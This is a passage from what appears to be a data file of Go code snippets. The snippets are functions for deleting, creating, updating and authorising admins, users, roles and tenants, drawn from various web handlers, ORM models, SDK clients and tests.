{\n\t\treturn 0, errors.Wrap(err, \"models: failed to get rows affected by delete for cmf_admin_menu\")\n\t}\n\n\tif err := o.doAfterDeleteHooks(ctx, exec); err != nil {\n\t\treturn 0, err\n\t}\n\n\treturn rowsAff, nil\n}", "func (aaa *LeaderboardConfigurationV3Service) DeleteLeaderboardConfigurationAdminV3(input *leaderboard_configuration_v3.DeleteLeaderboardConfigurationAdminV3Params) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.LeaderboardConfigurationV3.DeleteLeaderboardConfigurationAdminV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn internalServerError\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (aaa *LeaderboardConfigurationV3Service) HardDeleteLeaderboardAdminV3(input *leaderboard_configuration_v3.HardDeleteLeaderboardAdminV3Params) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.LeaderboardConfigurationV3.HardDeleteLeaderboardAdminV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn internalServerError\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (sec *DatabaseSecurity) DeleteAdminRole(role string) error {\n\tif err := sec.db.GetSecurity(sec); err != nil {\n\t\treturn err\n\t}\n\tsec.UpdateAdminRoles(role, true)\n\tif err := sec.db.SetSecurity(sec); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func UpdateAdmin(w http.ResponseWriter, r *http.Request) {\n\tvar body UpdateAdminRequest\n\tif err := read.JSON(r.Body, &body); err != nil {\n\t\trender.Error(w, admin.WrapError(admin.ErrorBadRequestType, err, \"error reading request body\"))\n\t\treturn\n\t}\n\n\tif err := body.Validate(); err != nil {\n\t\trender.Error(w, err)\n\t\treturn\n\t}\n\n\tid := chi.URLParam(r, \"id\")\n\tauth := mustAuthority(r.Context())\n\tadm, err := auth.UpdateAdmin(r.Context(), id, &linkedca.Admin{Type: body.Type})\n\tif err != nil {\n\t\trender.Error(w, admin.WrapErrorISE(err, \"error updating admin %s\", id))\n\t\treturn\n\t}\n\n\trender.ProtoJSON(w, adm)\n}", "func (admin *Admin) Destroy() {\n\tclose(admin.closeChan)\n\tC.hyperdex_admin_destroy(admin.ptr)\n}", "func AccepAdmin(c *gin.Context) {\r\n\tvar accountemp []model.UserTemporary\r\n\r\n\tif err := c.Bind(&accountemp); err != nil {\r\n\t\tutils.WrapAPIError(c, err.Error(), http.StatusBadRequest)\r\n\t\treturn\r\n\t}\r\n\r\n\t//fmt.Println(account)\r\n\r\n\t//q := model.DB.Save(&account)\r\n\r\n\t//approve akun\r\n\tq := model.DB.Delete(&accountemp)\r\n\trow := q.RowsAffected\r\n\r\n\tutils.WrapAPIData(c, map[string]interface{}{\r\n\t\t\"Data\": accountemp,\r\n\t\t\"Row affected\": row,\r\n\t}, http.StatusOK, \"success\")\r\n\r\n}", "func DeleteUser(userid int64) error {\n _, err := model.Database.Exec(\"DELETE FROM users WHERE userid = ? AND isadmin = ?\", userid, false)\n if err != nil {\n return err\n }\n return nil\n}", "func AdminCreate(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminCreate, w, data)\n}", "func AdminCreate(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminCreate, w, data)\n}", "func (c *Client) AdminDeleteUser(ctx context.Context, params *AdminDeleteUserInput, optFns ...func(*Options)) (*AdminDeleteUserOutput, error) {\n\tif params == nil {\n\t\tparams = &AdminDeleteUserInput{}\n\t}\n\n\tresult, metadata, err := c.invokeOperation(ctx, \"AdminDeleteUser\", params, optFns, addOperationAdminDeleteUserMiddlewares)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tout := result.(*AdminDeleteUserOutput)\n\tout.ResultMetadata = metadata\n\treturn out, nil\n}", "func (o *Auth) Delete(exec boil.Executor) error {\n\tif o == nil {\n\t\treturn errors.New(\"models: no Auth provided for delete\")\n\t}\n\n\tif err := o.doBeforeDeleteHooks(exec); err != nil {\n\t\treturn err\n\t}\n\n\targs := queries.ValuesFromMapping(reflect.Indirect(reflect.ValueOf(o)), authPrimaryKeyMapping)\n\tsql := \"DELETE FROM \\\"auths\\\" WHERE \\\"id\\\"=$1\"\n\n\tif boil.DebugMode {\n\t\tfmt.Fprintln(boil.DebugWriter, sql)\n\t\tfmt.Fprintln(boil.DebugWriter, args...)\n\t}\n\n\t_, err := exec.Exec(sql, args...)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"models: unable to delete from auths\")\n\t}\n\n\tif err := o.doAfterDeleteHooks(exec); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func Delete(c *gin.Context) {\n\ttokenStr := c.Request.Header.Get(\"Authorization\")\n\tif tokenStr == \"\" || len(tokenStr) < 7 {\n\t\tfailUpdate(c, http.StatusUnauthorized, \"Unauthorized\")\n\t\treturn\n\t}\n\t_, admin, valid, err := ParseToken(tokenStr[7:])\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\tif !valid || !admin {\n\t\tfailUpdate(c, http.StatusUnauthorized, \"Unauthorized\")\n\t\treturn\n\t}\n\n\tuserid := c.Param(\"userid\")\n\n\terr = model.Delete(userid)\n\tif err != nil {\n\t\tfailUpdate(c, http.StatusBadRequest, err.Error())\n\t\treturn\n\t}\n\tc.JSON(http.StatusNoContent, gin.H{\n\t\t\"message\": \"Deleted successfully\",\n\t\t\"status\": http.StatusNoContent,\n\t})\n}", "func (o *CMFBalanceChargeAdmin) Delete(ctx context.Context, exec boil.ContextExecutor) (int64, error) {\n\tif o == nil {\n\t\treturn 0, errors.New(\"models: no CMFBalanceChargeAdmin provided for delete\")\n\t}\n\n\tif err := o.doBeforeDeleteHooks(ctx, exec); err != nil {\n\t\treturn 0, err\n\t}\n\n\targs := queries.ValuesFromMapping(reflect.Indirect(reflect.ValueOf(o)), cmfBalanceChargeAdminPrimaryKeyMapping)\n\tsql := \"DELETE FROM `cmf_balance_charge_admin` WHERE `id`=?\"\n\n\tif boil.IsDebug(ctx) {\n\t\twriter := boil.DebugWriterFrom(ctx)\n\t\tfmt.Fprintln(writer, sql)\n\t\tfmt.Fprintln(writer, args...)\n\t}\n\tresult, err := exec.ExecContext(ctx, sql, args...)\n\tif err != nil {\n\t\treturn 0, errors.Wrap(err, \"models: unable to delete from cmf_balance_charge_admin\")\n\t}\n\n\trowsAff, err := result.RowsAffected()\n\tif err != nil {\n\t\treturn 0, errors.Wrap(err, \"models: failed to get rows affected by delete for cmf_balance_charge_admin\")\n\t}\n\n\tif err := o.doAfterDeleteHooks(ctx, exec); err != nil {\n\t\treturn 0, err\n\t}\n\n\treturn rowsAff, nil\n}", "func saveAdmin(e echo.Context) error {\n\tdb := e.Get(\"database\").(*mgo.Database)\n\tif db == nil {\n\t\treturn fmt.Errorf(\"Bad database session\")\n\t}\n\n\ta := models.Admin{}\n\terr := e.Bind(&a)\n\tif err != nil {\n\t\treturn err\n\t}\n\ta.ServerUpdateDateTime = time.Now().UTC()\n\n\texisting := models.Admin{}\n\terr = db.C(\"Admins\").Find(bson.M{\"adminUuid\": a.AdminUUID}).One(&existing)\n\n\tif err == nil {\n\t\tif existing.ServerUpdateDateTime.After(a.LocalUpdateDateTime) {\n\t\t\t// Server version is more recent\n\t\t\treturn e.JSON(http.StatusConflict, existing)\n\t\t}\n\n\t\ta.AdminID = existing.AdminID\n\t\t_, err = db.C(\"Admins\").UpsertId(existing.AdminID, &a)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\tif a.AdminID == \"\" {\n\t\t\ta.AdminID = bson.NewObjectId().String()\n\t\t}\n\n\t\terr = db.C(\"Admins\").Insert(&a)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn e.JSON(http.StatusOK, a)\n}", "func (aaa *RolesService) AdminDeleteRoleV3(input *roles.AdminDeleteRoleV3Params) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, conflict, internalServerError, err := aaa.Client.Roles.AdminDeleteRoleV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif conflict != nil {\n\t\treturn conflict\n\t}\n\tif internalServerError != nil {\n\t\treturn internalServerError\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (in *Admin) DeepCopy() *Admin {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(Admin)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (m *MockActivityHandler) AdminDeleteByID(w http.ResponseWriter, r *http.Request) {\n\tm.ctrl.T.Helper()\n\tm.ctrl.Call(m, \"AdminDeleteByID\", w, r)\n}", "func (c *Context) RunAdmin(fn testFunc) {\n\tif c.Admin != nil {\n\t\tc.Run(\"Admin\", fn)\n\t}\n}", "func (app *Application) Admin(w http.ResponseWriter, r *http.Request) {\n\tdata := struct {\n\t\tTime int64\n\t}{\n\t\tTime: time.Now().Unix(),\n\t}\n\n\tt, err := template.ParseFiles(\"views/index.tpl\")\n\n\tif err != nil {\n\t\tlog.Println(\"Template.Parse:\", err)\n\t\thttp.Error(w, \"Internal Server Error 0x0178\", http.StatusInternalServerError)\n\t}\n\n\tif err := t.Execute(w, data); err != nil {\n\t\tlog.Println(\"Template.Execute:\", err)\n\t\thttp.Error(w, \"Internal Server Error 0x0183\", http.StatusInternalServerError)\n\t}\n}", "func (dau *DdgAdminUser) Deleted() bool {\n\treturn dau._deleted\n}", "func (aaa *RolesService) AdminDeleteRoleV4(input *roles.AdminDeleteRoleV4Params) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.Roles.AdminDeleteRoleV4(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn internalServerError\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func getAdmin(e echo.Context) error {\n\tdb := e.Get(\"database\").(*mgo.Database)\n\tif db == nil {\n\t\treturn fmt.Errorf(\"Bad database session\")\n\t}\n\n\tvar id bson.ObjectId\n\tif idParam := e.QueryParam(\"id\"); idParam != \"\" && bson.IsObjectIdHex(idParam) {\n\t\tid = bson.ObjectIdHex(idParam)\n\t}\n\tuuid, err := uuid.FromString(e.QueryParam(\"uuid\"))\n\tif !id.Valid() && err != nil {\n\t\treturn fmt.Errorf(\"Bad parameters\")\n\t}\n\n\ta := models.Admin{}\n\tif id.Valid() {\n\t\terr = db.C(\"Admins\").FindId(id).One(&a)\n\t} else {\n\t\terr = db.C(\"Admins\").Find(bson.M{\"adminUuid\": uuid}).One(&a)\n\t}\n\tif err != nil {\n\t\treturn e.NoContent(http.StatusNotFound)\n\t}\n\treturn e.JSON(http.StatusOK, a)\n}", "func CreateAdmin(a AdminRegForm) (*mongo.InsertOneResult, error) {\n\tnewAdmin := Admin{\n\t\tID: primitive.NewObjectID(),\n\t\tFrasUsername: a.FrasUsername,\n\t\tPassword: a.Password,\n\t\tInstID: a.InstID,\n\t\tModifiedAt: time.Now(),\n\t}\n\treturn adminCollection.InsertOne(context.TODO(), newAdmin)\n}", "func (a *Auth) RequireAdmin() gin.HandlerFunc {\n\treturn a.requireToken(func(tokenID string, user *model.User) (bool, bool, uint) {\n\t\tif user != nil {\n\t\t\treturn true, user.Admin, user.ID\n\t\t}\n\t\tif token := a.DB.GetClientByToken(tokenID); token != nil {\n\t\t\treturn true, a.DB.GetUserByID(token.UserID).Admin, token.UserID\n\t\t}\n\t\treturn false, false, 0\n\t})\n}", "func AuthorizeAdmin(next buffalo.Handler) buffalo.Handler {\n\n\treturn func(c buffalo.Context) error {\n\n\t\tisAdmin := c.Value(\"current_user\").(*models.User).IsAdmin\n\n\t\tif !isAdmin {\n\n\t\t\treturn c.Redirect(301, \"/\")\n\n\t\t}\n\n\t\treturn next(c)\n\n\t}\n}", "func TestDaoDeletePrivilege(t *testing.T) {\n\tconvey.Convey(\"DeletePrivilege\", t, func() {\n\t\ta, err := d.DeletePrivilege(context.TODO(), 3)\n\t\tconvey.So(err, convey.ShouldBeNil)\n\t\tconvey.So(a, convey.ShouldNotBeNil)\n\t})\n}", "func (r *AccountDIDRegistry) RemoveAdmin(caller DID) error {\n\tfor i, admin := range r.Admins {\n\t\tif admin == caller {\n\t\t\tr.Admins = append(r.Admins[:i], r.Admins[i+1:]...)\n\t\t\treturn nil\n\t\t}\n\t}\n\treturn fmt.Errorf(\"caller %s is not an admin\", caller)\n}", "func Delete(w http.ResponseWriter, r *http.Request) {\n\tdb := dbConn()\n\temp := r.URL.Query().Get(\"id\")\n\tlog.Println(emp)\n\tdelForm, err := db.Prepare(\"DELETE FROM Employee WHERE id=?\")\n\tif err != nil {\n\t\tpanic(err.Error())\n\t}\n\tdelForm.Exec(emp)\n\tlog.Println(\"DELETE\")\n\tdefer db.Close()\n\thttp.Redirect(w, r, \"/\", 301)\n}", "func TestDeleteStaffPrivileges(t *testing.T) {\n\tcreds := client.Credentials{Username: testStaff1Username, Password: testStaff1UserPassword}\n\ttestData := []testDeleteData{\n\t\ttestDeleteData{testAdmin1ID, http.StatusForbidden}, // Delete of admin not allowed\n\t\ttestDeleteData{testStaff1ID, http.StatusBadRequest}, // Can't delete yourself\n\t\ttestDeleteData{testStaff2ID, http.StatusForbidden},\n\t\ttestDeleteData{testBasic1ID, http.StatusOK},\n\t}\n\tdeleteTest(t, creds, testData)\n}", "func CheckAdmin() gin.HandlerFunc {\n\treturn func(ctx *gin.Context) {\n\t\tif !utils.IsTatAdmin(ctx) {\n\t\t\tctx.AbortWithError(http.StatusForbidden, errors.New(\"user is not admin\"))\n\t\t}\n\t}\n}", "func (auup *AuthUserUserPermission) Delete(ctx context.Context, db DB) error {\n\tswitch {\n\tcase !auup._exists: // doesn't exist\n\t\treturn nil\n\tcase auup._deleted: // deleted\n\t\treturn nil\n\t}\n\t// delete with single primary key\n\tconst sqlstr = `DELETE FROM django.auth_user_user_permissions ` +\n\t\t`WHERE id = :1`\n\t// run\n\tlogf(sqlstr, auup.ID)\n\tif _, err := db.ExecContext(ctx, sqlstr, auup.ID); err != nil {\n\t\treturn logerror(err)\n\t}\n\t// set deleted\n\tauup._deleted = true\n\treturn nil\n}", "func DeleteRelative(c *gin.Context) {\n\tid_admin, _ := strconv.Atoi(c.Param(\"id\"))\n\tid_relative, _ := strconv.Atoi(c.Param(\"id_relative\"))\n\n\tadminUser, db := selectUserID(id_admin, c)\n\trelativeUser, _ := selectUserID(id_relative, c)\n\tdefer db.Close()\n\n\tdb.Model(&adminUser).Association(\"UsersFamily\").Delete(&relativeUser)\n\tdb.Save(&adminUser)\n\n\tc.JSON(200, adminUser)\n}", "func (auh *AdminUserHandler) DeleteUser(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {\n\n\tvar apiKey = r.Header.Get(\"api-key\")\n\tif apiKey == \"\" || (apiKey != adminApiKey && apiKey != userApiKey) {\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\thttp.Error(w, http.StatusText(http.StatusForbidden), http.StatusForbidden)\n\t\treturn\n\t}\n\tid, err := strconv.Atoi(ps.ByName(\"id\"))\n\n\tif err != nil {\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\thttp.Error(w, http.StatusText(http.StatusNotFound), http.StatusNotFound)\n\t\treturn\n\t}\n\n\t_, errs := auh.userService.DeleteUser(uint(id))\n\n\tif len(errs) > 0 {\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\thttp.Error(w, http.StatusText(http.StatusNotFound), http.StatusNotFound)\n\t\treturn\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusNoContent)\n\treturn\n}", "func (m *GroupMutation) ResetAdmin() {\n\tm.admin = nil\n\tm.clearedadmin = false\n}", "func (dag *DdgAdminGroup) Delete(ctx context.Context, key ...interface{}) error {\n\tvar err error\n\tvar dbConn *sql.DB\n\n\t// if deleted, bail\n\tif dag._deleted {\n\t\treturn nil\n\t}\n\n\ttx, err := components.M.GetConnFromCtx(ctx)\n\tif err != nil {\n\t\tdbConn, err = components.M.GetMasterConn()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\ttableName, err := GetDdgAdminGroupTableName(key...)\n\tif err != nil {\n\t\treturn err\n\t}\n\t//1\n\n\t// sql query with composite primary key\n\tsqlstr := `UPDATE ` + tableName + ` SET is_del = 1 WHERE id = ?`\n\n\t// run query\n\tutils.GetTraceLog(ctx).Debug(\"DB\", zap.String(\"SQL\", fmt.Sprint(sqlstr, dag.ID)))\n\tif tx != nil {\n\t\t_, err = tx.Exec(sqlstr, dag.ID)\n\t} else {\n\t\t_, err = dbConn.Exec(sqlstr, dag.ID)\n\t}\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// set deleted\n\tdag._deleted = true\n\n\treturn nil\n}", "func DeleteGuest(resp http.ResponseWriter, req *http.Request, db *sql.DB) {\n\t// Get the request parameters\n\tparams := mux.Vars(req)\n\n\t// Retrieve name from params. Here, the space in the name will be given as + in the REST API url.\n\t// Hence, we replace \"+\" in guest name with \" \".\n\tguestName := strings.Replace(params[\"name\"], \"+\", \" \", -1)\n\n\t// Deleting guest from the guest list\n\terrDB := databse.DeleteGuestFromList(db, guestName)\n\tif errDB != nil {\n\t\tencodeResponse(resp, map[string]string{\"error\": errDB.Error()}, http.StatusBadRequest)\n\t\treturn\n\t}\n\t// Encode the response\n\tencodeResponse(resp, errDB, http.StatusNoContent)\n}", "func NewDeleteaspecificAdminRequest(server string, id string) (*http.Request, error) {\n\tvar err error\n\n\tvar pathParam0 string\n\n\tpathParam0, err = runtime.StyleParam(\"simple\", false, \"id\", id)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tqueryUrl, err := url.Parse(server)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tbasePath := fmt.Sprintf(\"/admins/%s\", pathParam0)\n\tif basePath[0] == '/' {\n\t\tbasePath = basePath[1:]\n\t}\n\n\tqueryUrl, err = queryUrl.Parse(basePath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq, err := http.NewRequest(\"DELETE\", queryUrl.String(), nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn req, nil\n}", "func AdminEdit(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminEdit, w, data)\n}", "func AdminEdit(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminEdit, w, data)\n}", "func (d *Dosen) Delete(db *sql.DB) error {\n\tif d.ID == \"\" {\n\t\treturn fmt.Errorf(\"id tidak bolehh kosong\")\n\t}\n\tquery := \"DELETE FROM dosen where id = $1\"\n\t_, err := db.Exec(query, &d.ID)\n\treturn err\n}", "func (h *Handlers) ActionDel(w http.ResponseWriter, r *http.Request) {\n\tshort := r.FormValue(\"id\")\n\tsecret := r.FormValue(\"secret\")\n\tLog.Println(\"formparams\", short, secret)\n\trespStr := h.storage.DelAlias(short, secret)\n\tfmt.Fprint(w, respStr)\n}", "func Delete(r *http.Request, cfg config.Config) (int, http.Header, []byte, error) {\n\n\t//STANDARD DECLARATIONS START\n\n\tcode := http.StatusOK\n\th := http.Header{}\n\toutput := []byte(\"\")\n\terr := error(nil)\n\tcharset := \"utf-8\"\n\n\t//STANDARD DECLARATIONS END\n\n\t// Set Content-Type response Header value\n\tcontentType := r.Header.Get(\"Accept\")\n\th.Set(\"Content-Type\", fmt.Sprintf(\"%s; charset=%s\", contentType, charset))\n\n\tvars := mux.Vars(r)\n\n\t// Try to open the mongo session\n\tsession, err := mongo.OpenSession(cfg.MongoDB)\n\tdefer session.Close()\n\n\tif err != nil {\n\t\tcode = http.StatusInternalServerError\n\t\treturn code, h, output, err\n\t}\n\n\tfilter := bson.M{\"id\": vars[\"ID\"]}\n\n\t// Retrieve Results from database\n\tresults := []Tenant{}\n\terr = mongo.Find(session, cfg.MongoDB.Db, \"tenants\", filter, \"name\", &results)\n\n\tif err != nil {\n\t\tcode = http.StatusInternalServerError\n\t\treturn code, h, output, err\n\t}\n\n\t// Check if nothing found\n\tif len(results) < 1 {\n\t\toutput, _ = respond.MarshalContent(respond.NotFound, contentType, \"\", \" \")\n\t\tcode = http.StatusNotFound\n\t\treturn code, h, output, err\n\t}\n\n\tmongo.Remove(session, cfg.MongoDB.Db, \"tenants\", filter)\n\n\tif err != nil {\n\t\tcode = http.StatusInternalServerError\n\t\treturn code, h, output, err\n\t}\n\n\t// Create view of the results\n\toutput, err = createMsgView(\"Tenant Successfully Deleted\", 200) //Render the results into JSON\n\n\tif err != nil {\n\t\tcode = http.StatusInternalServerError\n\t\treturn code, h, output, err\n\t}\n\n\th.Set(\"Content-Type\", fmt.Sprintf(\"%s; charset=%s\", contentType, charset))\n\treturn code, h, output, err\n\n}", "func (o *Cvtermsynonym) Delete(exec boil.Executor) error {\n\tif o == nil {\n\t\treturn errors.New(\"chado: no Cvtermsynonym provided for delete\")\n\t}\n\n\tif err := o.doBeforeDeleteHooks(exec); err != nil {\n\t\treturn err\n\t}\n\n\targs := queries.ValuesFromMapping(reflect.Indirect(reflect.ValueOf(o)), cvtermsynonymPrimaryKeyMapping)\n\tsql := \"DELETE FROM \\\"cvtermsynonym\\\" WHERE \\\"cvtermsynonym_id\\\"=$1\"\n\n\tif boil.DebugMode {\n\t\tfmt.Fprintln(boil.DebugWriter, sql)\n\t\tfmt.Fprintln(boil.DebugWriter, args...)\n\t}\n\n\t_, err := exec.Exec(sql, args...)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"chado: unable to delete from cvtermsynonym\")\n\t}\n\n\tif err := o.doAfterDeleteHooks(exec); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func TestCannotRemoveAllClusterAdmins(t *testing.T) {\n\tif testing.Short() {\n\t\tt.Skip(\"Skipping integration tests in short mode\")\n\t}\n\tdeleteAll(t)\n\talice := tu.UniqueString(\"alice\")\n\taliceClient, adminClient := getPachClient(t, alice), getPachClient(t, admin)\n\n\t// Check that the initial set of admins is just \"admin\"\n\tresp, err := adminClient.GetAdmins(adminClient.Ctx(), &auth.GetAdminsRequest{})\n\trequire.NoError(t, err)\n\trequire.ElementsEqual(t, []string{admin}, resp.Admins)\n\n\t// admin cannot remove themselves from the list of cluster admins (otherwise\n\t// there would be no admins)\n\t_, err = adminClient.ModifyAdmins(adminClient.Ctx(),\n\t\t&auth.ModifyAdminsRequest{Remove: []string{\"admin\"}})\n\trequire.YesError(t, err)\n\trequire.NoError(t, backoff.Retry(func() error {\n\t\tresp, err = adminClient.GetAdmins(adminClient.Ctx(), &auth.GetAdminsRequest{})\n\t\trequire.NoError(t, err)\n\t\treturn require.ElementsEqualOrErr([]string{admin}, resp.Admins)\n\t}, backoff.NewTestingBackOff()))\n\n\t// admin can make alice a cluster administrator\n\t_, err = adminClient.ModifyAdmins(adminClient.Ctx(),\n\t\t&auth.ModifyAdminsRequest{\n\t\t\tAdd: []string{alice},\n\t\t})\n\trequire.NoError(t, err)\n\trequire.NoError(t, backoff.Retry(func() error {\n\t\tresp, err = adminClient.GetAdmins(adminClient.Ctx(), &auth.GetAdminsRequest{})\n\t\trequire.NoError(t, err)\n\t\treturn require.ElementsEqualOrErr([]string{admin, gh(alice)}, resp.Admins)\n\t}, backoff.NewTestingBackOff()))\n\n\t// Now admin can remove themselves as a cluster admin\n\t_, err = adminClient.ModifyAdmins(adminClient.Ctx(),\n\t\t&auth.ModifyAdminsRequest{Remove: []string{\"admin\"}})\n\trequire.NoError(t, err)\n\trequire.NoError(t, backoff.Retry(func() error {\n\t\tresp, err = adminClient.GetAdmins(adminClient.Ctx(), &auth.GetAdminsRequest{})\n\t\trequire.NoError(t, err)\n\t\treturn require.ElementsEqualOrErr([]string{gh(alice)}, resp.Admins)\n\t}, backoff.NewTestingBackOff()))\n\n\t// now alice is the only admin, and she cannot remove herself as a cluster\n\t// administrator\n\t_, err = aliceClient.ModifyAdmins(aliceClient.Ctx(),\n\t\t&auth.ModifyAdminsRequest{Remove: []string{alice}})\n\trequire.YesError(t, err)\n\trequire.NoError(t, backoff.Retry(func() error {\n\t\tresp, err = aliceClient.GetAdmins(aliceClient.Ctx(), &auth.GetAdminsRequest{})\n\t\trequire.NoError(t, err)\n\t\treturn require.ElementsEqualOrErr([]string{gh(alice)}, resp.Admins)\n\t}, backoff.NewTestingBackOff()))\n\n\t// alice *can* swap herself and \"admin\"\n\t_, err = aliceClient.ModifyAdmins(aliceClient.Ctx(),\n\t\t&auth.ModifyAdminsRequest{\n\t\t\tAdd: []string{\"admin\"},\n\t\t\tRemove: []string{alice},\n\t\t})\n\trequire.NoError(t, err)\n\trequire.NoError(t, backoff.Retry(func() error {\n\t\tresp, err = adminClient.GetAdmins(adminClient.Ctx(), &auth.GetAdminsRequest{})\n\t\trequire.NoError(t, err)\n\t\treturn require.ElementsEqualOrErr([]string{admin}, resp.Admins)\n\t}, backoff.NewTestingBackOff()))\n}", "func AdminHandler(c buffalo.Context) error {\n\tadminR.HTMLLayout = \"main.html\"\n\tc.Set(\"adminpage\", makeAdminPage(\"Dashboard\", \"get stuff done!\", \"Index\"))\n\treturn c.Render(200, adminR.HTML(\"index.html\"))\n}", "func deleteTenant(c *cli.Context) error {\n\terr := checkArgCount(c, 1)\n\tif err != nil {\n\t\treturn err\n\t}\n\tid := c.Args().First()\n\n\tclient.Photonclient, err = client.GetClient(c)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tdeleteTask, err := client.Photonclient.Tenants.Delete(id)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t_, err = waitOnTaskOperation(deleteTask.ID, c)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = clearConfigTenant(id)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func SaveAdmin(admin *model.Admin) error {\n\n\tpassword, err := crypto.AESEncrypt(admin.Password)\n\tif err != nil {\n\t\treturn err\n\t}\n\tadmin.Password = password\n\tif admin.Password == \"\" {\n\t\treturn fmt.Errorf(\"Encrypt failure\")\n\t}\n\treturn db.From(\"admin\").Save(admin)\n\n}", "func IsAdmin(next echo.HandlerFunc) echo.HandlerFunc {\n\treturn func(c echo.Context) error {\n\t\tuser := c.Get(\"user\").(*jwt.Token)\n\t\tclaims := user.Claims.(jwt.MapClaims)\n\t\tisAdmin := claims[\"admin\"].(bool)\n\t\tif isAdmin == false {\n\t\t\treturn echo.ErrUnauthorized\n\t\t}\n\t\treturn next(c)\n\t}\n}", "func (hh *HealthCheckHandler) Delete(w http.ResponseWriter, r *http.Request) {\n\tuuid := utils.ExtractUUID(r.URL.String())\n\thh.db.Delete(uuid)\n}", "func TenantDelete(tenantID string) {\n\tRunCmd(fmt.Sprintf(\"%s tenant -op=del -id=%s\", ActlPath, tenantID))\n}", "func AdminMiddleware(ctx iris.Context) {\n\tadmin, err := isAdmin(ctx)\n\tif err != nil {\n\t\tctx.StatusCode(http.StatusInternalServerError)\n\t\tctx.JSON(jsonError{Error: err.Error()})\n\t\tctx.StopExecution()\n\t\treturn\n\t}\n\tif !admin {\n\t\tctx.StatusCode(http.StatusUnauthorized)\n\t\tctx.JSON(jsonError{Error: \"Droits administrateur requis\"})\n\t\tctx.StopExecution()\n\t\treturn\n\t}\n\tctx.Next()\n}", "func adminHandler(w http.ResponseWriter, r *http.Request, _ map[string]string) {\n\tif database.RetrieveUsersCount() == 0 {\n\t\thttp.Redirect(w, r, \"/admin/register\", http.StatusFound)\n\t\treturn\n\t}\n\tuserName := sessionHandler.GetUserName(r)\n\tif userName != \"\" {\n\t\thttp.ServeFile(w, r, filepath.Join(filenames.AdminFilepath, \"admin.html\"))\n\t\treturn\n\t}\n\thttp.Redirect(w, r, \"/admin/login\", http.StatusFound)\n}", "func CmdAdmins(ctx *system.Context) {\n\tgconfig := ctx.Get(\"gconfig\").(*models.Guild)\n\tSetStrings(ctx, gconfig, \"Admins\", []string{}, &gconfig.Admins)\n}", "func (dao *sqlimpl) Del(meta *idm.UserMeta) (e error) {\n\tstmt := dao.GetStmt(\"DeleteMeta\")\n\tif stmt == nil {\n\t\treturn fmt.Errorf(\"Unknown statement\")\n\t}\n\tdefer stmt.Close()\n\n\tif _, e := stmt.Exec(meta.Uuid); e != nil {\n\t\treturn e\n\t} else if e := dao.DeletePoliciesForResource(meta.Uuid); e != nil 